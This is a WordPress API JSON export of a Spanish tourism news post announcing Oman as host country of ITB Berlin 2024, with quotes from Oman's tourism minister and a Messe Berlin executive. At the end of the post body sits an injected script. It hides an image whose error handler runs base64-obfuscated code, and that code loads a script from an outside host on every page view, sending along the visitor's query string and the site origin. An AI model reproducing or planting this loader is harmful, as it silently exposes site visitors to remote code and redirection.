{"id":6783,"date":"2023-05-17T11:19:55","date_gmt":"2023-05-17T14:19:55","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6783"},"modified":"2025-08-13T16:00:10","modified_gmt":"2025-08-13T19:00:10","slug":"oman-sera-el-pais-anfitrion-de-itb-berlin-2024","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6783","title":{"rendered":"Om\u00e1n ser\u00e1 el pa\u00eds anfitri\u00f3n de ITB Berl\u00edn 2024"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#82630e\"><em>El Sultanato en el sureste de la Pen\u00ednsula Ar\u00e1biga y la principal feria comercial de viajes del mundo anuncian su asociaci\u00f3n oficial<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-6698\" width=\"370\" height=\"184\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-324x160.jpg 324w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 370px) 100vw, 370px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sub><mark>Publicidad:<\/mark><\/sub><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>El Ministerio de Patrimonio y Turismo de Om\u00e1n e ITB Berl\u00edn han anunciado que el Sultanato de Om\u00e1n ser\u00e1 el pa\u00eds anfitri\u00f3n oficial de la Feria comercial de viajes l\u00edder en el mundo en 2024. \u201dITB Berl\u00edn es una plataforma potente para mostrar la variedad de las muchas ofertas que Om\u00e1n puede proporcionar en la creciente industria del turismo\u201d, dice Su Excelencia Salim Al Mahrouqi, Ministro de Patrimonio y Turismo del Sultanato de Om\u00e1n. \u201cNos complace que en 2024, el Sultanato de Om\u00e1n sea el pa\u00eds anfitri\u00f3n y estamos comprometidos a brindarle al evento una experiencia impresionante y duradera que cubra todos los sentidos y expectativas posibles\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>El ministro hab\u00eda firmado previamente una declaraci\u00f3n de intenciones durante una ceremonia informal en ITB Berl\u00edn 2023 para sellar la asociaci\u00f3n en una fecha pr\u00f3xima. Posteriormente, se llev\u00f3 a cabo la firma oficial del acuerdo con David Ruetz, vicepresidente senior de Messe Berlin.<\/p>\n\n\n\n<p>\u00abOm\u00e1n ha estado fuertemente representado en ITB Berl\u00edn durante muchos a\u00f1os y estamos muy impresionados por las atracciones tur\u00edsticas y la diversidad que este destino tur\u00edstico tiene para ofrecer\u00bb, dijo David Ruetz. \u00abCon el Sultanato, estamos encantados de haber asegurado un socio tan atractivo. para el programa del pr\u00f3ximo a\u00f1o\u201d.<\/p>\n\n\n\n<p>El pa\u00eds en el sureste de la Pen\u00ednsula Ar\u00e1biga cuenta con una historia impresionante que abarca 5000 a\u00f1os y es conocido por sus muchas atracciones diferentes. Los viajeros pueden esperar un destino acogedor y un para\u00edso natural de muchos contrastes que atrae a los visitantes en busca de relajaci\u00f3n y actividades por igual. Adem\u00e1s de dunas de arena dorada y oasis verdes, el Sultanato cuenta con altas monta\u00f1as e impresionantes cuevas, as\u00ed como playas de arena y acantilados que se extienden por kil\u00f3metros. Actividades al aire libre como snorkel, senderismo y escalada completan la oferta tur\u00edstica.<\/p>\n\n\n\n<p>Como pa\u00eds anfitri\u00f3n oficial de ITB Berl\u00edn 2024, Om\u00e1n organizar\u00e1 la ceremonia de apertura el 4 de marzo de 2024 en el CityCube Berl\u00edn, entre otros eventos. Del 5 al 7 de marzo, el Sultanato ofrecer\u00e1 a los visitantes profesionales un amplio programa con numerosos eventos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/news-81114-oman-sera-el-pais-anfitrion-de-itb-berlin-2024\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-6784\" width=\"189\" height=\"28\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_.jpeg 365w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-300x44.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-356x54.jpeg 356w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-320x47.jpeg 320w\" sizes=\"(max-width: 189px) 100vw, 189px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Sultanato en el sureste de la Pen\u00ednsula Ar\u00e1biga y la principal feria comercial de viajes del mundo anuncian su asociaci\u00f3n oficial El Ministerio de Patrimonio y Turismo de Om\u00e1n e ITB Berl\u00edn han anunciado que el Sultanato de Om\u00e1n ser\u00e1 el pa\u00eds anfitri\u00f3n oficial de la Feria comercial de viajes l\u00edder en el mundo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6785,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-6783","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6783"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6783\/revisions"}],"predecessor-version":[{"id":10400,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6783\/revisions\/10400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6785"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6783"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}